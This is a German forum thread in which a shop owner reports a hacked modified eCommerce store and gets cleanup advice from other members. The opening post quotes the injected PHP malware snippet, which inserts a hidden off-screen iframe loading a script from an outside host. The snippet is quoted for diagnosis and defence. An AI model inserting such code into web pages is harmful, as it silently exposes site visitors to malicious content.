rechtstexte für onlineshop
Neuigkeiten
  • Die modified eCommerce Shopsoftware ist kostenlos, aber nicht umsonst.
    Spenden
  • Damit wir die modified eCommerce Shopsoftware auch zukünftig kostenlos anbieten können:
    Spenden
  • Thema: Shop gehackt

    webster

    • Neu im Forum
    • Beiträge: 4
    Shop gehackt
    am: 14. Oktober 2013, 23:08:09
    Hallo an alle!

    Mein Shop wurde heute Nachmittag gehackt. Wenn ich die Adresse anwähle kommt eine leere Seite, die Datenbank scheint aber intakt zu sein.
    In vielen Dateien sitzt folgender Codeschnipsel:

    Code: PHP  [Auswählen]
    <?php
    #44e890#
    if(empty($dzmaa)) {
    $dzmaa = "<style>body {overflow-x:hidden;overflow-y:auto;} </style>
    <iframe id=\"apxlp\" name=\"apxlp\" style=\"position:absolute; height: 100px; width:120px; left:5000px; top:120px;\" src=\"http://dev.estadodigital.com/clik.php\" > </iframe>
    "
    ;
    echo $dzmaa;
    }

    #/44e890#
    ?>

    Wenn ich diesen entferne und den Shop neu lade ist er sofort wieder da.

    Kann mir jemand helfen? Wir sichern jeden Tag mit MySql Dumper unsere Datenbank, aber die Dateien an sich haben wir vernachlässigt.

    Vielen lieben Dank!

    Linkback: https://www.modified-shop.org/forum/index.php?topic=28010.0

    noRiddle (revilonetz)

    • Experte
    • Beiträge: 14.025
    • Geschlecht:
    Re: Shop gehackt
    Antwort #1 am: 15. Oktober 2013, 01:23:31
    • Alle Shopdateien herunterladen.
    • Mit notepad++ oder anderem geeigneten Programm kompletten Ordner nach $dzmaa durchsuchen.
    • Ebenfalls durchführen mit den SQL-Dateien der DB-Sicherung.
    • Sofort alle Passworte ändern, auch die der DB (configure.php-Dateien anpassen nicht vergessen).
    • Rechner mit Malwarebytes scannen.
      Hast du eine vernünftige Antivirus-Implementation auf dem Rechner ?

    Welches FTP-Programm benutzt du ?
    Falls Filezilla, bitte mal nach Kiosk-Mode "suchmaschinen" und diesen verwenden.

    Gruß,
    noRiddle

    jumpM

    • Fördermitglied
    • Beiträge: 697
    • Geschlecht:
    Re: Shop gehackt
    Antwort #2 am: 15. Oktober 2013, 07:14:25
    Hi,

    Ich hatte mal das Problem bei einem Kunden!
    der o. g. Codeschnipsel ist in allen index-Dateien (sowohl HTML als auch PHP)!!!

    Gruss
    Robert

    fishnet

    • Fördermitglied
    • Beiträge: 4.821
    • Geschlecht:
    Re: Shop gehackt
    Antwort #3 am: 15. Oktober 2013, 07:46:11

    webster

    • Neu im Forum
    • Beiträge: 4
    Re: Shop gehackt
    Antwort #4 am: 15. Oktober 2013, 09:00:57
    Danke für eure Antworten.

    Ich habe all die Passwörter geändert und auch diesen Codeschnipsel aus allen Dateien entfernt. Nur wenn ich den Shop wieder starte, ist dieser Codeschnipsel sofort wieder in all diesen Dateien da. Die Datenbank ist sauber und es gibt keinen Unterschied zu der Datensicherung von gestern früh.
    Es muss wohl noch eine Stelle geben, über die das ganze gesteuert ist. Weiß jemand Rat?

    Ich benutze normalerweise Filezilla, wir haben aber seit längerem nichts mehr an dem Shop gemacht.

    Katharina.

    fishnet

    • Fördermitglied
    • Beiträge: 4.821
    • Geschlecht:
    Re: Shop gehackt
    Antwort #5 am: 15. Oktober 2013, 09:27:39
    (D)ein PC scheint immer noch verseucht zu sein und/oder du hast den Virus nicht überall entfernt.

    Zitat
    Den eigenen PC auf Viren prüfen
    Häufig wird ein Shop mit Malware durch den eigenen PC verseucht. In diesem Fall wurde nicht in den Shop eingebrochen sondern in den PC mit dem dieser gepflegt wird. Man hat also “selber” die Malware in dem Shop aufgespielt. Unverschlüsselte Passwörter bei Filezilla sind so ein Beispiel.
    Der eigene PC sollte also mit verschiedenen Programmen auf Viren geprüft werden.

    Quelle: FAQ: Hilfe, ich glaube mein Shop wurde gehackt

    mooncrawler

    • Mitglied
    • Beiträge: 104
    Re: Shop gehackt
    Antwort #6 am: 15. Oktober 2013, 09:36:50
    Es könnte an FileZilla liegen. Lade es mal mit einem anderen FTP Programm hoch (vorher FTP Zugangsdaten ändern). Dein PC ist bestimmt "infiziert". FileZilla speichert die Passwörter in Klartext ab, somit lassen sich die Zugangsdaten an dritte weitergeben. Hatte sowas auch mal vor ein paar Jahren, der Zugang wurde an einen Server geschickt, später griff ein Client per FTP auf den Server zu und änderte alle index.php / index.html Daten. Alle "neuen" Dateien hatten am ende ein PHP Codeschnipsel.

    webster

    • Neu im Forum
    • Beiträge: 4
    Re: Shop gehackt
    Antwort #7 am: 15. Oktober 2013, 12:12:31
    Danke an alle! Mit einem anderen FTP Client habe ich alles bereinigen können.

    jumpM

    • Fördermitglied
    • Beiträge: 697
    • Geschlecht:
    Re: Shop gehackt
    Antwort #8 am: 15. Oktober 2013, 12:15:38
    Hallo,

    am besten mal nach "combofix" googlen, oder hier herunterladen (kostenlos)

    http://www.bleepingcomputer.com/download/combofix/!

    Der eleminiert den Trojaner sicher  :flee:!! Am besten Filezilla gleich mit eleminieren  :thumbs:
    Also erst den lokalen Rechner und dann die Dateien die Du uploaden willst!

    Gruss
    Robert

    jumpM

    • Fördermitglied
    • Beiträge: 697
    • Geschlecht:
    Re: Shop gehackt
    Antwort #9 am: 15. Oktober 2013, 12:16:07
    oops..........

    war ich zu langsam...........

    Robert
    5 Antworten
    3249 Aufrufe
    03. Dezember 2012, 23:54:09 von Zaldoran
    2 Antworten
    3366 Aufrufe
    21. Juni 2014, 18:32:33 von hirnbeisser
    14 Antworten
    6995 Aufrufe
    07. Januar 2010, 13:44:07 von BeBa
    7 Antworten
    4630 Aufrufe
    13. März 2012, 12:05:07 von baustelle